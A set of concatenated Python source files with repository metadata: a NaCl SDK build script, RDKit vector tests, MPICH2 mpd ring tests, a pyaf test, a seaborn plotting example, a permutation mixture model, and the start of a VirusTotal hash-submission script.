buildbot_common.Run([sys.executable, CYGTAR, '-C', OUT_DIR, '-cjf', tarfile,
'pepper_' + pepper_ver], cwd=NACL_DIR)
def BuildStepRunTests():
args = []
if options.build_experimental:
args.append('--experimental')
if options.run_pyauto_tests:
args.append('--pyauto')
test_sdk.main(args)
def GetManifestBundle(pepper_ver, revision, tarfile, archive_url):
with open(tarfile, 'rb') as tarfile_stream:
archive_sha1, archive_size = manifest_util.DownloadAndComputeHash(
tarfile_stream)
archive = manifest_util.Archive(manifest_util.GetHostOS())
archive.url = archive_url
archive.size = archive_size
archive.checksum = archive_sha1
bundle = manifest_util.Bundle('pepper_' + pepper_ver)
bundle.revision = int(revision)
bundle.repath = 'pepper_' + pepper_ver
bundle.version = int(pepper_ver)
bundle.description = 'Chrome %s bundle, revision %s' % (pepper_ver, revision)
bundle.stability = 'dev'
bundle.recommended = 'no'
bundle.archives = [archive]
return bundle
def BuildStepArchiveBundle(pepper_ver, revision, tarfile):
buildbot_common.BuildStep('Archive build')
bucket_path = 'nativeclient-mirror/nacl/nacl_sdk/%s' % (
build_utils.ChromeVersion(),)
tarname = os.path.basename(tarfile)
tarfile_dir = os.path.dirname(tarfile)
buildbot_common.Archive(tarname, bucket_path, tarfile_dir)
# generate "manifest snippet" for this archive.
archive_url = GSTORE + 'nacl_sdk/%s/%s' % (
build_utils.ChromeVersion(), tarname)
bundle = GetManifestBundle(pepper_ver, revision, tarfile, archive_url)
manifest_snippet_file = os.path.join(OUT_DIR, tarname + '.json')
with open(manifest_snippet_file, 'wb') as manifest_snippet_stream:
manifest_snippet_stream.write(bundle.GetDataAsString())
buildbot_common.Archive(tarname + '.json', bucket_path, OUT_DIR,
step_link=False)
def BuildStepArchiveSDKTools():
# Only push up sdk_tools.tgz and nacl_sdk.zip on the linux buildbot.
builder_name = os.getenv('BUILDBOT_BUILDERNAME', '')
if builder_name == 'linux-sdk-multi':
buildbot_common.BuildStep('Build SDK Tools')
build_updater.BuildUpdater(OUT_DIR)
buildbot_common.BuildStep('Archive SDK Tools')
bucket_path = 'nativeclient-mirror/nacl/nacl_sdk/%s' % (
build_utils.ChromeVersion(),)
buildbot_common.Archive('sdk_tools.tgz', bucket_path, OUT_DIR,
step_link=False)
buildbot_common.Archive('nacl_sdk.zip', bucket_path, OUT_DIR,
step_link=False)
def main(args):
parser = optparse.OptionParser()
parser.add_option('--run-tests',
help='Run tests. This includes building examples.', action='store_true')
parser.add_option('--run-pyauto-tests',
help='Run the pyauto tests for examples.', action='store_true')
parser.add_option('--skip-tar', help='Skip generating a tarball.',
action='store_true')
parser.add_option('--archive', help='Force the archive step.',
action='store_true')
parser.add_option('--gyp',
help='Use gyp to build examples/libraries/Makefiles.',
action='store_true')
parser.add_option('--release', help='PPAPI release version.',
dest='release', default=None)
parser.add_option('--experimental',
help='build experimental examples and libraries', action='store_true',
dest='build_experimental')
parser.add_option('--skip-toolchain', help='Skip toolchain download/untar',
action='store_true')
parser.add_option('--mac_sdk',
help='Set the mac_sdk (e.g. 10.6) to use when building with ninja.',
dest='mac_sdk')
global options
options, args = parser.parse_args(args[1:])
platform = getos.GetPlatform()
arch = 'x86'
generate_make.use_gyp = options.gyp
# TODO(binji) for now, only test examples on non-trybots. Trybots don't build
# pyauto Chrome.
if buildbot_common.IsSDKBuilder():
options.run_tests = True
options.run_pyauto_tests = True
options.archive = True
if buildbot_common.IsSDKTrybot():
options.run_tests = True
toolchains = ['newlib', 'glibc', 'pnacl', 'host']
print 'Building: ' + ' '.join(toolchains)
if options.archive and options.skip_tar:
parser.error('Incompatible arguments with archive.')
pepper_ver = str(int(build_utils.ChromeMajorVersion()))
pepper_old = str(int(build_utils.ChromeMajorVersion()) - 1)
pepperdir = os.path.join(SRC_DIR, 'out', 'pepper_' + pepper_ver)
pepperdir_old = os.path.join(SRC_DIR, 'out', 'pepper_' + pepper_old)
clnumber = build_utils.ChromeRevision()
tarname = 'naclsdk_' + platform + '.tar.bz2'
tarfile = os.path.join(OUT_DIR, tarname)
if options.release:
pepper_ver = options.release
print 'Building PEPPER %s at %s' % (pepper_ver, clnumber)
if 'NACL_SDK_ROOT' in os.environ:
# We don't want the currently configured NACL_SDK_ROOT to have any effect
    # on the build.
del os.environ['NACL_SDK_ROOT']
if not options.skip_toolchain:
BuildStepDownloadToolchains(platform)
BuildStepCleanPepperDirs(pepperdir, pepperdir_old)
BuildStepMakePepperDirs(pepperdir, ['include', 'toolchain', 'tools'])
BuildStepCopyTextFiles(pepperdir, pepper_ver, clnumber)
if not options.skip_toolchain:
BuildStepUntarToolchains(pepperdir, platform, arch, toolchains)
BuildStepBuildToolchains(pepperdir, platform, arch, pepper_ver, toolchains)
InstallHeaders(os.path.join(pepperdir, 'include'), None, 'libs')
BuildStepCopyBuildHelpers(pepperdir, platform)
BuildStepCopyExamples(pepperdir, toolchains, options.build_experimental, True)
# Ship with libraries prebuilt, so run that first.
BuildStepBuildLibraries(pepperdir, platform, 'src')
BuildStepGenerateNotice(pepperdir)
if not options.skip_tar:
BuildStepTarBundle(pepper_ver, tarfile)
if options.run_tests:
BuildStepRunTests()
# Archive on non-trybots.
if options.archive:
BuildStepArchiveBundle(pepper_ver, clnumber, tarfile)
BuildStepArchiveSDKTools()
return 0
if __name__ == '__main__':
sys.exit(main(sys.argv))
|
leighpauls/k2cro4
|
native_client_sdk/src/build_tools/build_sdk.py
|
Python
|
bsd-3-clause
| 31,480
|
# $Id$
#
# Copyright (C) 2007,2008 Greg Landrum
#
# @@ All Rights Reserved @@
#
import os
import sys
import unittest
from rdkit import RDConfig
#import pickle
from rdkit.six.moves import cPickle as pickle
from rdkit import DataStructs as ds
class TestCase(unittest.TestCase):
def setUp(self) :
pass
def test1Discrete(self):
v1 = ds.DiscreteValueVect(ds.DiscreteValueType.ONEBITVALUE, 30)
for i in range(15):
      v1[2*i] = 1
self.assertTrue(len(v1) == 30)
self.assertTrue(v1.GetTotalVal() == 15)
for i in range(len(v1)):
self.assertTrue(v1[i] == (i+1)%2)
self.assertRaises(ValueError, lambda : v1.__setitem__(5, 2))
v1 = ds.DiscreteValueVect(ds.DiscreteValueType.TWOBITVALUE, 30)
for i in range(len(v1)):
      v1[i] = i%4
self.assertTrue(len(v1) == 30)
for i in range(len(v1)):
self.assertTrue(v1[i] == i%4)
self.assertRaises(ValueError, lambda : v1.__setitem__(10, 6))
v1 = ds.DiscreteValueVect(ds.DiscreteValueType.FOURBITVALUE, 30)
for i in range(len(v1)):
      v1[i] = i%16
self.assertTrue(len(v1) == 30)
self.assertTrue(v1.GetTotalVal() == 211)
for i in range(len(v1)):
self.assertTrue(v1[i] == i%16)
self.assertRaises(ValueError, lambda : v1.__setitem__(10, 16))
v1 = ds.DiscreteValueVect(ds.DiscreteValueType.EIGHTBITVALUE, 32)
for i in range(len(v1)):
      v1[i] = i%256
self.assertTrue(len(v1) == 32)
self.assertTrue(v1.GetTotalVal() == 496)
for i in range(len(v1)):
self.assertTrue(v1[i] == i%256)
self.assertRaises(ValueError, lambda : v1.__setitem__(10, 256))
v1 = ds.DiscreteValueVect(ds.DiscreteValueType.SIXTEENBITVALUE, 300)
for i in range(len(v1)):
      v1[i] = i%300
self.assertTrue(len(v1) == 300)
self.assertTrue(v1.GetTotalVal() == 44850)
self.assertRaises(ValueError, lambda : v1.__setitem__(10, 65536))
def test2VectDistances(self):
v1 = ds.DiscreteValueVect(ds.DiscreteValueType.ONEBITVALUE, 30)
v2 = ds.DiscreteValueVect(ds.DiscreteValueType.ONEBITVALUE, 30)
for i in range(15):
v1[2*i] = 1
v2[2*i] = 1
self.assertTrue(ds.ComputeL1Norm(v1, v2) == 0)
for i in range(30):
if (i%3 == 0):
v2[i] = 1
else:
v2[i] = 0
self.assertTrue(ds.ComputeL1Norm(v1, v2) == 15)
v1 = ds.DiscreteValueVect(ds.DiscreteValueType.TWOBITVALUE, 30)
v2 = ds.DiscreteValueVect(ds.DiscreteValueType.TWOBITVALUE, 30)
for i in range(30):
v1[i] = i%4
v2[i] = (i+1)%4
self.assertTrue(ds.ComputeL1Norm(v1, v2) == 44)
v1 = ds.DiscreteValueVect(ds.DiscreteValueType.FOURBITVALUE, 16)
v2 = ds.DiscreteValueVect(ds.DiscreteValueType.FOURBITVALUE, 16)
for i in range(16):
v1[i] = i%16
v2[i] = i%5
self.assertTrue(ds.ComputeL1Norm(v1, v2) == 90)
v1 = ds.DiscreteValueVect(ds.DiscreteValueType.EIGHTBITVALUE, 5)
v2 = ds.DiscreteValueVect(ds.DiscreteValueType.EIGHTBITVALUE, 5)
v1[0] = 34
v1[1] = 167
v1[2] = 3
v1[3] = 56
v1[4] = 128
v2[0] = 14
v2[1] = 67
v2[2] = 103
v2[3] = 6
v2[4] = 228
self.assertTrue(ds.ComputeL1Norm(v1, v2) == 370)
v1 = ds.DiscreteValueVect(ds.DiscreteValueType.SIXTEENBITVALUE, 3)
v2 = ds.DiscreteValueVect(ds.DiscreteValueType.SIXTEENBITVALUE, 3)
v1[0] = 2345
v1[1] = 64578
v1[2] = 34
v2[0] = 1345
v2[1] = 54578
v2[2] = 10034
self.assertTrue(ds.ComputeL1Norm(v1, v2) == 21000)
def test3Pickles(self):
#outF = file('dvvs.pkl','wb+')
with open(
os.path.join(RDConfig.RDBaseDir,
'Code/DataStructs/Wrap/testData/dvvs.pkl'),
'rb'
) as inF:
v1 = ds.DiscreteValueVect(ds.DiscreteValueType.ONEBITVALUE, 30)
for i in range(15):
v1[2*i] = 1
v2 = pickle.loads(pickle.dumps(v1))
self.assertTrue(ds.ComputeL1Norm(v1, v2) == 0)
#cPickle.dump(v1,outF)
v2=pickle.load(inF, encoding='bytes')
self.assertTrue(ds.ComputeL1Norm(v1, v2) == 0)
self.assertTrue(v1.GetTotalVal()==v2.GetTotalVal())
self.assertTrue(v2.GetTotalVal()!=0)
v1 = ds.DiscreteValueVect(ds.DiscreteValueType.TWOBITVALUE, 30)
for i in range(30):
v1[i] = i%4
v2 = pickle.loads(pickle.dumps(v1))
self.assertTrue(ds.ComputeL1Norm(v1, v2) == 0)
#pickle.dump(v1,outF)
v2=pickle.load(inF, encoding='bytes')
self.assertTrue(ds.ComputeL1Norm(v1, v2) == 0)
self.assertTrue(v1.GetTotalVal()==v2.GetTotalVal())
self.assertTrue(v2.GetTotalVal()!=0)
v1 = ds.DiscreteValueVect(ds.DiscreteValueType.FOURBITVALUE, 16)
for i in range(16):
v1[i] = i%16
v2 = pickle.loads(pickle.dumps(v1))
self.assertTrue(ds.ComputeL1Norm(v1, v2) == 0)
#pickle.dump(v1,outF)
v2=pickle.load(inF, encoding='bytes')
self.assertTrue(ds.ComputeL1Norm(v1, v2) == 0)
self.assertTrue(v1.GetTotalVal()==v2.GetTotalVal())
self.assertTrue(v2.GetTotalVal()!=0)
v1 = ds.DiscreteValueVect(ds.DiscreteValueType.EIGHTBITVALUE, 5)
v1[0] = 34
v1[1] = 167
v1[2] = 3
v1[3] = 56
v1[4] = 128
v2 = pickle.loads(pickle.dumps(v1))
self.assertTrue(ds.ComputeL1Norm(v1, v2) == 0)
#pickle.dump(v1,outF)
v2=pickle.load(inF, encoding='bytes')
self.assertTrue(ds.ComputeL1Norm(v1, v2) == 0)
self.assertTrue(v1.GetTotalVal()==v2.GetTotalVal())
self.assertTrue(v2.GetTotalVal()!=0)
v1 = ds.DiscreteValueVect(ds.DiscreteValueType.SIXTEENBITVALUE, 3)
v1[0] = 2345
v1[1] = 64578
v1[2] = 34
v2 = pickle.loads(pickle.dumps(v1))
self.assertTrue(ds.ComputeL1Norm(v1, v2) == 0)
#pickle.dump(v1,outF)
v2=pickle.load(inF, encoding='bytes')
self.assertTrue(ds.ComputeL1Norm(v1, v2) == 0)
self.assertTrue(v1.GetTotalVal()==v2.GetTotalVal())
self.assertTrue(v2.GetTotalVal()!=0)
def test4DiscreteVectOps(self):
v1 = ds.DiscreteValueVect(ds.DiscreteValueType.TWOBITVALUE, 8)
for i in range(4):
v1[2*i] = 2
self.assertTrue(v1.GetTotalVal()==8)
v2 = ds.DiscreteValueVect(ds.DiscreteValueType.TWOBITVALUE, 8)
for i in range(4):
v2[2*i+1] = 2
v2[2*i] = 1
self.assertTrue(v2.GetTotalVal()==12)
v3 = v1|v2
self.assertTrue(len(v3)==len(v2))
self.assertTrue(v3.GetTotalVal()==16)
v3 = v1&v2
self.assertTrue(len(v3)==len(v2))
self.assertTrue(v3.GetTotalVal()==4)
v4 = v1+v2
self.assertTrue(len(v4)==len(v2))
self.assertTrue(v4.GetTotalVal()==20)
v4 = v1-v2
self.assertTrue(v4.GetTotalVal()==4)
v4 = v2-v1
self.assertTrue(v4.GetTotalVal()==8)
v4 = v2
v4 -= v1
self.assertTrue(v4.GetTotalVal()==8)
v4 -= v4
self.assertTrue(v4.GetTotalVal()==0)
def testIterator(self):
"""
connected to sf.net issue 1719831:
http://sourceforge.net/tracker/index.php?func=detail&aid=1719831&group_id=160139&atid=814650
"""
v1 = ds.DiscreteValueVect(ds.DiscreteValueType.ONEBITVALUE, 30)
for i in range(15):
      v1[2*i] = 1
l1 = list(v1)
self.assertTrue(len(l1)==len(v1))
for i,v in enumerate(v1):
self.assertTrue(l1[i]==v)
self.assertRaises(IndexError,lambda :v1[40])
def test9ToNumpy(self):
import numpy
bv = ds.DiscreteValueVect(ds.DiscreteValueType.FOURBITVALUE,32)
bv[0]=1
bv[1]=4
bv[17]=1
bv[23]=8
bv[31]=12
arr = numpy.zeros((3,),'i')
ds.ConvertToNumpyArray(bv,arr)
for i in range(len(bv)):
self.assertEqual(bv[i],arr[i])
if __name__ == '__main__':
unittest.main()
|
AlexanderSavelyev/rdkit
|
Code/DataStructs/Wrap/testDiscreteValueVect.py
|
Python
|
bsd-3-clause
| 7,665
|
#!/usr/bin/env python
# (C) 2001 by Argonne National Laboratory.
# See COPYRIGHT in top-level directory.
#
# Note that I repeat code for each test just in case I want to
# run one separately. I can simply copy it out of here and run it.
# A single test can typically be changed simply by altering its value(s)
# for one or more of:
# PYEXT, NMPDS, HFILE
import os, sys, commands
sys.path += [os.getcwd()] # do this once
print "odd tests---------------------------------------------------"
clusterHosts = [ 'bp4%02d' % (i) for i in range(0,8) ]
print "clusterHosts=", clusterHosts
MPIDir = "/home/rbutler/mpich2"
MPI_1_Dir = "/home/rbutler/mpich1i"
# test: singleton init (cpi)
print "TEST singleton init (cpi)"
PYEXT = '.py'
NMPDS = 1
HFILE = 'temph'
import os,socket
from mpdlib import MPDTest
mpdtest = MPDTest()
os.environ['MPD_CON_EXT'] = 'testing'
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
os.system("mpdboot%s -1 -f %s -n %d" % (PYEXT,HFILE,NMPDS) )
expout = ['Process 0 of 1','pi is approximately 3']
rv = mpdtest.run(cmd="%s/examples/cpi" % (MPIDir), grepOut=1, expOut=expout )
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
# test: bnr (mpich1-compat using cpi)
print "TEST bnr (mpich1-compat using cpi)"
PYEXT = '.py'
NMPDS = 1
HFILE = 'temph'
import os,socket
from mpdlib import MPDTest
mpdtest = MPDTest()
os.environ['MPD_CON_EXT'] = 'testing'
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
os.system("mpdboot%s -1 -f %s -n %d" % (PYEXT,HFILE,NMPDS) )
expout = ['Process 0 on','Process 1 on','Process 2 on','pi is approximately 3']
rv = mpdtest.run(cmd="mpiexec%s -bnr -n 3 %s/examples/cpi" % (PYEXT,MPI_1_Dir),
grepOut=1, expOut=expout )
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
# test:
print "TEST ^C to mpiexec"
PYEXT = '.py'
NMPDS = 1
HFILE = 'temph'
import os,socket
from mpdlib import MPDTest
mpdtest = MPDTest()
os.environ['MPD_CON_EXT'] = 'testing'
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
temph = open(HFILE,'w')
for host in clusterHosts: print >>temph, host
temph.close()
os.system("mpdboot%s -f %s -n %d" % (PYEXT,HFILE,NMPDS) )
import popen2
runner = popen2.Popen4("mpiexec%s -n 2 infloop -p" % (PYEXT)) # -p => don't print
import time ## give the mpiexec
time.sleep(2) ## time to get going
os.system("kill -INT %d" % (runner.pid) ) # simulate user ^C
expout = ''
rv = mpdtest.run(cmd="mpdlistjobs%s #2" % (PYEXT), chkOut=1, expOut=expout )
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
os.system("killall -q infloop") ## just to be safe
# test:
print "TEST re-knit a ring"
PYEXT = '.py'
NMPDS = 3
HFILE = 'temph'
import os,socket
from mpdlib import MPDTest
mpdtest = MPDTest()
os.environ['MPD_CON_EXT'] = 'testing'
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
import popen2, time
mpd1 = popen2.Popen4("mpd%s -l 12345" % (PYEXT))
time.sleep(2)
mpd2 = popen2.Popen4("mpd%s -n -h %s -p 12345" % (PYEXT,socket.gethostname()) )
mpd3 = popen2.Popen4("mpd%s -n -h %s -p 12345" % (PYEXT,socket.gethostname()) )
time.sleep(2)
rv = mpdtest.run(cmd="mpdtrace%s" % (PYEXT), chkOut=0 )
if len(rv['OUT']) != NMPDS:
print "a: unexpected number of lines of output from mpdtrace", rv['OUT']
sys.exit(-1)
hostname = socket.gethostname()
for line in rv['OUT']:
if line.find(hostname) < 0:
print "a: bad lines in output of mpdtrace", rv['OUT']
sys.exit(-1)
os.system("kill -9 %d" % (mpd3.pid) )
time.sleep(1)
rv = mpdtest.run(cmd="mpdtrace%s" % (PYEXT), chkOut=0 )
if len(rv['OUT']) != NMPDS-1:
print "b: unexpected number of lines of output from mpdtrace", rv['OUT']
sys.exit(-1)
hostname = socket.gethostname()
for line in rv['OUT']:
if line.find(hostname) < 0:
print "b: bad lines in output of mpdtrace", rv['OUT']
sys.exit(-1)
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
|
gnu3ra/SCC15HPCRepast
|
INSTALLATION/mpich2-1.4.1p1/src/pm/mpd/test/test5.py
|
Python
|
bsd-3-clause
| 3,936
|
import tests.missing_data.test_missing_data_air_passengers_generic as gen
gen.test_air_passengers_missing_data('DiscardRow', None)
|
antoinecarme/pyaf
|
tests/missing_data/test_missing_data_air_passengers_DiscardRow_None.py
|
Python
|
bsd-3-clause
| 132
|
"""
Paired density and scatterplot matrix
=====================================
_thumb: .5, .5
"""
import seaborn as sns
sns.set(style="white")
df = sns.load_dataset("iris")
g = sns.PairGrid(df, diag_sharey=False)
g.map_upper(sns.scatterplot)
g.map_lower(sns.kdeplot, colors="C0")
g.map_diag(sns.kdeplot, lw=2)
|
anntzer/seaborn
|
examples/pair_grid_with_kde.py
|
Python
|
bsd-3-clause
| 314
|
from __future__ import division, print_function, absolute_import
import numpy as np
import itertools as itr
import amitgroup as ag
from scipy.special import logit
from scipy.misc import logsumexp
from sklearn.base import BaseEstimator
import time
class PermutationMM(BaseEstimator):
"""
A Bernoulli mixture model with the option of a latent permutation. Each
sample gets transformed a number of times into a set of blocks. The
parameter space is similarly divided into blocks, which when trained
will represent the same transformations. The latent permutation
dictates what parameter block a sample block should be tested against.
    Parameters
    ----------
    n_components : int, optional
        Number of mixture components. Defaults to 1.
    permutations : int or array, optional
        If an integer, it gives the number of permutations and a cyclic
        permutation scheme is built automatically. If an array, each row
        is a permutation of the blocks.
random_state : RandomState or an int seed (0 by default)
A random number generator instance
min_prob : float, optional
Floor for the minimum probability
thresh : float, optional
Convergence threshold.
n_iter : float, optional
Number of EM iterations to perform
n_init : int, optional
Number of random initializations to perform with
the best kept.
Attributes
----------
`weights_` : array, shape (`n_components`,)
Stores the mixing weights for each component
`means_` : array, shape (`n_components`, `n_features`)
Mean parameters for each mixture component.
`converged_` : bool
True when convergence was reached in fit(), False otherwise.
"""
def __init__(self, n_components=1, permutations=1, n_iter=20, n_init=1, random_state=0, min_probability=0.05, thresh=1e-8):
if not isinstance(random_state, np.random.RandomState):
random_state = np.random.RandomState(random_state)
self.random_state = random_state
self.n_components = n_components
if isinstance(permutations, int):
# Cycle through them
P = permutations
            self.permutations = np.zeros((P, P), dtype=int)
for p1, p2 in itr.product(range(P), range(P)):
self.permutations[p1,p2] = (p1 + p2) % P
else:
self.permutations = np.asarray(permutations)
self.n_iter = n_iter
self.n_init = n_init
self.min_probability = min_probability
self.thresh = thresh
self.weights_ = None
self.means_ = None
def score_block_samples(self, X):
"""
        Score complete samples according to the full model. This means that
        each sample carries all of its blocks, with the different
        transformations for each permutation.
Parameters
----------
X : ndarray
Array of samples. Must have shape `(N, P, D)`, where `N` are number
of samples, `P` number of permutations and `D` number of dimensions
(flattened if multi-dimensional).
Returns
-------
logprob : array_like, shape (n_samples,)
Log probabilities of each full data point in X.
log_responsibilities : array_like, shape (n_samples, n_components, n_permutations)
Log posterior probabilities of each mixture component and
permutation for each observation.
"""
N = X.shape[0]
K = self.n_components
P = len(self.permutations)
unorm_log_resp = np.empty((N, K, P))
unorm_log_resp[:] = np.log(self.weights_[np.newaxis])
for p in range(P):
for shift in range(P):
p0 = self.permutations[shift,p]
unorm_log_resp[:,:,p] += np.dot(X[:,p0], logit(self.means_[:,shift]).T)
        unorm_log_resp += np.log(1 - self.means_[:, self.permutations]).sum(2).sum(2)
logprob = logsumexp(unorm_log_resp.reshape((unorm_log_resp.shape[0], -1)), axis=-1)
log_resp = (unorm_log_resp - logprob[...,np.newaxis,np.newaxis]).clip(min=-500)
return logprob, log_resp
def fit(self, X):
"""
Estimate model parameters with the expectation-maximization algorithm.
Parameters are set when constructing the estimator class.
Parameters
----------
X : array_like, shape (n, n_permutations, n_features)
Array of samples, where each sample has been transformed `n_permutations` times.
"""
        ag.info("fit(): X has shape {0}".format(X.shape))
assert X.ndim == 3
N, P, F = X.shape
assert P == len(self.permutations)
K = self.n_components
eps = self.min_probability
max_log_prob = -np.inf
for trial in range(self.n_init):
self.weights_ = np.ones((K, P)) / (K * P)
# Initialize by picking K components at random.
repr_samples = X[self.random_state.choice(N, K, replace=False)]
self.means_ = repr_samples.clip(eps, 1 - eps)
#self.q = np.empty((N, K, P))
loglikelihoods = []
self.converged_ = False
for loop in range(self.n_iter):
start = time.clock()
# E-step
logprob, log_resp = self.score_block_samples(X)
resp = np.exp(log_resp)
log_dens = logsumexp(log_resp.transpose((0, 2, 1)).reshape((-1, log_resp.shape[1])), axis=0)[np.newaxis,:,np.newaxis]
dens = np.exp(log_dens)
# M-step
for p in range(P):
v = 0.0
for shift in range(P):
p0 = self.permutations[shift,p]
v += np.dot(resp[:,:,shift].T, X[:,p0])
self.means_[:,p,:] = v
self.means_ /= dens.ravel()[:,np.newaxis,np.newaxis]
self.means_[:] = self.means_.clip(eps, 1 - eps)
self.weights_[:] = (np.apply_over_axes(np.sum, resp, [0])[0,:,:] / N).clip(0.0001, 1 - 0.0001)
# Calculate log likelihood
loglikelihoods.append(logprob.sum())
ag.info("Trial {trial}/{n_trials} Iteration {iter} Time {time:.2f}s Log-likelihood {llh}".format(trial=trial+1,
n_trials=self.n_init,
iter=loop+1,
time=time.clock() - start,
llh=loglikelihoods[-1]))
                # loglikelihoods is reset at the start of every trial, so the
                # look-back must be guarded by the inner loop counter.
                if loop > 0 and abs(loglikelihoods[-1] - loglikelihoods[-2])/abs(loglikelihoods[-2]) < self.thresh:
                    self.converged_ = True
                    break
if loglikelihoods[-1] > max_log_prob:
ag.info("Updated best log likelihood to {0}".format(loglikelihoods[-1]))
max_log_prob = loglikelihoods[-1]
best_params = {'weights': self.weights_,
'means' : self.means_,
'converged': self.converged_}
self.weights_ = best_params['weights']
self.means_ = best_params['means']
self.converged_ = best_params['converged']
def predict_flat(self, X):
"""
        Returns an array of the mixture component each data entry is most
        associated with. This is similar to `predict`, except it collapses
        component and permutation to a single index.
Parameters
----------
X : ndarray
Data array to predict.
Returns
-------
components: list
An array of length `num_data` where `components[i]` indicates
the argmax of the posteriors. The permutation EM gives two indices, but
            they have been flattened in C order as ``component * n_permutations + permutation``.
"""
logprob, log_resp = self.score_block_samples(X)
ii = log_resp.reshape((log_resp.shape[0], -1)).argmax(-1)
return ii
def predict(self, X):
"""
        Returns a 2D array of the mixture component each data entry is most associated with.
Parameters
----------
X : ndarray
Data array to predict.
Returns
-------
components: list
An array of shape `(num_data, 2)` where `components[i]` indicates
the argmax of the posteriors. For each sample, we have two values,
the first is the part and the second is the permutation.
"""
ii = self.predict_flat(X)
return np.vstack(np.unravel_index(ii, (self.n_components, len(self.permutations)))).T
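# A minimal usage sketch (editor's addition, not part of the original
# module): fit the mixture on random binary data. Shapes follow the fit()
# docstring, (n_samples, n_permutations, n_features); running it assumes
# the module's dependencies (amitgroup, and a scipy old enough to still
# ship scipy.misc.logsumexp) are installed.
if __name__ == '__main__':
    rng = np.random.RandomState(0)
    X_demo = (rng.rand(200, 2, 16) > 0.5).astype(float)
    mm = PermutationMM(n_components=3, permutations=2, n_iter=5)
    mm.fit(X_demo)
    # predict() returns one (component, permutation) pair per sample.
    print(mm.predict(X_demo)[:5])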
|
jiajunshen/partsNet
|
pnet/permutation_mm.py
|
Python
|
bsd-3-clause
| 9,041
|
# Authors: Phani Vadrevu <pvadrevu@uga.edu>
# Roberto Perdisci <perdisci@cs.uga.edu>
import sys
from datetime import timedelta, date
import time
import simplejson
import logging
import logging.config
from config import *
import vt_api
import util
LOG_CONF_FILE = "logging.conf"
class VTSubmissions:
def __init__(self):
self.QUERY_RATE_LIMIT = 10
self.ONE_MIN = 60
logging.config.fileConfig(LOG_CONF_FILE)
self.logger = logging.getLogger("amico_logger")
#stdout_handler = logging.StreamHandler(sys.stdout)
#stdout_handler.setLevel(logging.DEBUG)
#formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s'
#'- %(message)s')
#stdout_handler.setFormatter(formatter)
#self.logger.addHandler(stdout_handler)
util.setup_socks()
self.conn = util.connect_to_db()
self.cursor = self.conn.cursor()
self.today = date.today().strftime("%Y-%m-%d")
self.yesterday = (date.today() -
timedelta(days=1)).strftime("%Y-%m-%d")
self.last_month = (date.today() -
timedelta(days=30)).strftime("%Y-%m-%d")
def get_hashes_from_db(self):
if vt_submissions == "manual":
hashes = self.get_hashes_from_db_manual()
elif vt_submissions == "live":
hashes = self.get_hashes_from_db_live()
else:
hashes = self.get_hashes_from_db_scans()
self.logger.debug("get_hashes_from_db(): Yesterday's hahses: %s", len(hashes))
self.hashes = self.update_hashes(hashes)
def update_hashes(self, hashes):
self.cursor.execute("""
SELECT distinct md5, sha1
FROM virus_total_submissions
WHERE (submit_time::date) = %s
""", (self.last_month,))
if self.cursor.rowcount > 0:
hashes = hashes.union(self.cursor.fetchall())
self.cursor.execute("""
SELECT distinct md5, sha1
FROM virus_total_submissions
WHERE (submit_time::date) > %s AND
(submit_time::date) < %s
""", (self.last_month, self.yesterday))
if self.cursor.rowcount > 0:
hashes = hashes.difference(self.cursor.fetchall())
self.cursor.execute("""
SELECT distinct md5, sha1
FROM virus_total_submissions
WHERE (submit_time::date) = %s
""", (self.today,))
if self.cursor.rowcount > 0:
hashes = hashes.difference(self.cursor.fetchall())
self.logger.debug("update_hashes(): Number of hashes: %s", len(hashes))
return hashes
def get_hashes_from_db_scans(self):
self.cursor.execute("""
SELECT distinct md5, sha1
FROM virus_total_scans
WHERE json IS NOT NULL AND
query_time::date = %s
""", (self.yesterday,))
if self.cursor.rowcount > 0:
hashes = set(self.cursor.fetchall())
else:
hashes = set()
return hashes
def get_hashes_from_db_live(self):
self.cursor.execute("""
SELECT distinct md5, sha1
FROM pe_dumps
WHERE sha1 IS NOT NULL AND
timestamp::date = %s
""", (self.yesterday,))
if self.cursor.rowcount > 0:
hashes = set(self.cursor.fetchall())
else:
hashes = set()
return hashes
def get_hashes_from_db_manual(self):
self.logger.debug("entered get_hashes_from_db_manual()")
self.cursor.execute("""
SELECT distinct md5, sha1
FROM manual_download_checksums
WHERE referer_exists = 'f' AND
sha1 IS NOT NULL AND
timestamp::date = %s
""", (self.yesterday,))
if self.cursor.rowcount > 0:
hashes = set(self.cursor.fetchall())
else:
hashes = set()
return hashes
def insert_scan(self, sha1, md5, response):
self.logger.debug("entered insert_scan()")
self.cursor.execute("""
INSERT INTO virus_total_submissions
(submit_time, sha1, md5, scan_id)
VALUES (LOCALTIMESTAMP, %s, %s, %s)
RETURNING vt_submit_id
""", (sha1, md5, response['scan_id']))
vt_submit_id = self.cursor.fetchone()[0]
self.cursor.execute("""
UPDATE virus_total_submissions
SET resubmit_id = %s
WHERE sha1= %s AND
submit_time::date = %s
""", (vt_submit_id, sha1, self.last_month))
def check_report_exists(self, sha1):
self.cursor.execute("""
SELECT * FROM virus_total_scans
WHERE sha1 = %s AND
scan_time IS NOT NULL""", (sha1, ))
report_exists = True if self.cursor.rowcount else False
self.cursor.execute("""
SELECT * FROM virus_total_submissions
WHERE sha1 = %s AND
json IS NOT NULL""", (sha1, ))
report_exists = True if self.cursor.rowcount else report_exists
return report_exists
def make_request(self, md5, sha1):
self.logger.debug("entered make_request()")
self.logger.debug("sha1: %s", sha1)
report_exists = self.check_report_exists(sha1)
self.logger.debug("report_exists: %s", report_exists)
json = None
try:
json = (vt_api.rescan_request(md5) if report_exists else
vt_api.send_file(md5))
if json:
response = simplejson.loads(json)
if response["response_code"] == 1:
self.insert_scan(sha1, md5, response)
return True
else:
self.logger.warning("make_request: Bad response code: %s",
response["response_code"])
else:
self.logger.warning("make_request: No JSON response")
except Exception as e:
self.logger.exception("report_exists: %s", report_exists)
self.logger.exception("json: %s", json)
self.logger.exception("sha1: %s", sha1)
self.logger.exception("make_request: Error %s", e)
return False
def submit_hashes(self):
